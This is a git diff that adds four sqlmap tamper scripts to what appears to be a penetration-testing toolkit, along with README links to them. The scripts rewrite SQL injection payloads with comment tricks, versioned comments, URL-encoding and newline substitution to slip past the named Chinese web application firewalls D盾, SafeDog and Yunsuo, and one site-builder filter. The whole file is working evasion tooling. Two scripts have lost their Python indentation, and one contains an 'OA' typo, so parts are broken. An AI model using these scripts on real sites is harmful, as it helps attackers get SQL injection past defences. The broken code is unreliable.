diff --git a/README.md b/README.md index d36c3e0f..be19bac6 100644 --- a/README.md +++ b/README.md @@ -122,6 +122,10 @@ - [crt.sh证书/域名收集](./tools/crt.sh证书收集.py) - [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan) - [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan) +- [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py) +- [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py) +- [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py) +- [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py) ## 说明 diff --git "a/tools/sqlmap_bypass_D\347\233\276_tamper.py" "b/tools/sqlmap_bypass_D\347\233\276_tamper.py" new file mode 100644 index 00000000..8d5c8b40 --- /dev/null +++ "b/tools/sqlmap_bypass_D\347\233\276_tamper.py" @@ -0,0 +1,34 @@ +# coding=UTF-8 +# Desc: sqlmap_bypass_D盾_tamper + +from lib.core.enums import PRIORITY +__priority__ = PRIORITY.LOW + + +def dependencies(): + pass + + +def tamper(payload, **kwargs): + """ + BYPASS Ddun + """ + retVal = payload + if payload: + retVal = "" + quote, doublequote, firstspace = False, False, False + for i in xrange(len(payload)): + if not firstspace: + if payload[i].isspace(): + firstspace = True + retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" + continue + elif payload[i] == '\'': + quote = not quote + elif payload[i] == '"': + doublequote = not doublequote + elif payload[i] == " " and not doublequote and not quote: + retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" + continue + retVal += payload[i] + return retVal \ No newline at end of file diff --git "a/tools/sqlmap_bypass_\344\272\221\351\224\201_tamper.py" "b/tools/sqlmap_bypass_\344\272\221\351\224\201_tamper.py" new file mode 100644 index 00000000..547b1be9 --- /dev/null +++ "b/tools/sqlmap_bypass_\344\272\221\351\224\201_tamper.py" @@ -0,0 +1,27 @@ +# coding=UTF-8 +# Desc: sqlmap bypass 云锁 tamper +""" +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +__priority__ = PRIORITY.LOW + + +def dependencies(): + pass + + +def tamper(payload, **kwargs): + payload = payload.replace('ORDER', '/*!00000order*/') + payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select') + payload = payload.replace('CONCAT(', "CONCAT/**/(") + payload = payload.replace("--", " */--") + payload = payload.replace("AND", "%26%26") + return payload diff --git "a/tools/sqlmap_bypass_\345\256\211\345\205\250\347\213\227_tamper.py" "b/tools/sqlmap_bypass_\345\256\211\345\205\250\347\213\227_tamper.py" new file mode 100644 index 00000000..6d9c6853 --- /dev/null +++ "b/tools/sqlmap_bypass_\345\256\211\345\205\250\347\213\227_tamper.py" @@ -0,0 +1,24 @@ +# coding=UTF-8 +# Desc: sqlmap_bypass_安全狗_tamper + +from lib.core.enums import PRIORITY +from lib.core.settings import UNICODE_ENCODING +__priority__ = PRIORITY.LOW +def dependencies(): +pass +def tamper(payload, **kwargs): + +if payload: +payload=payload.replace(" ","/*!*/") +payload=payload.replace("=","/*!*/=/*!*/") +payload=payload.replace("AND","/*!*/AND/*!*/") +payload=payload.replace("UNION","union/*!88888cas*/") +payload=payload.replace("#","/*!*/#") +payload=payload.replace("USER()","USER/*!()*/") +payload=payload.replace("DATABASE()","DATABASE/*!()*/") +payload=payload.replace("--","/*!*/--") +payload=payload.replace("SELECT","/*!88888cas*/select") +payload=payload.replace("FROM","/*!99999c*//*!99999c*/from") +print payload + +return payload \ No newline at end of file diff --git "a/tools/sqlmap_bypass_\347\251\272\346\240\274\346\233\277\346\215\242\346\210\220\346\215\242\350\241\214\347\254\246-\346\237\220\344\274\201\344\270\232\345\273\272\347\253\231\347\250\213\345\272\217\350\277\207\346\273\244_tamper.py" "b/tools/sqlmap_bypass_\347\251\272\346\240\274\346\233\277\346\215\242\346\210\220\346\215\242\350\241\214\347\254\246-\346\237\220\344\274\201\344\270\232\345\273\272\347\253\231\347\250\213\345\272\217\350\277\207\346\273\244_tamper.py" new file mode 100644 index 00000000..a37b0f13 --- /dev/null +++ "b/tools/sqlmap_bypass_\347\251\272\346\240\274\346\233\277\346\215\242\346\210\220\346\215\242\350\241\214\347\254\246-\346\237\220\344\274\201\344\270\232\345\273\272\347\253\231\347\250\213\345\272\217\350\277\207\346\273\244_tamper.py" @@ -0,0 +1,59 @@ +# coding=UTF-8 +# Desc: sqlmap_bypass_某企业建站程序过滤_tamper + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): +pass + +def tamper(payload, **kwargs): +""" +把空格替换成换行符:%0A +Replaces space character (' ') with comments '%0A' + +Tested against: +* Microsoft SQL Server 2005 +* MySQL 4, 5.0 and 5.5 +* Oracle 10g +* PostgreSQL 8.3, 8.4, 9.0 + +Notes: +* Useful to bypass weak and bespoke web application firewalls + +>>> tamper('SELECT id FROM users') +'SELECT%0Aid%0AFROM%0Ausers' +""" + +retVal = payload + +if payload: +retVal = "" +quote, doublequote, firstspace = False, False, False + +for i in xrange(len(payload)): +if not firstspace: +if payload[i].isspace(): +firstspace = True +retVal += "/%OA/" +continue + +elif payload[i] == '\'': +quote = not quote + +elif payload[i] == '"': +doublequote = not doublequote + +elif payload[i] == " " and not doublequote and not quote: +retVal += "/%0A/" +continue + +retVal += payload[i] + +return retVal \ No newline at end of file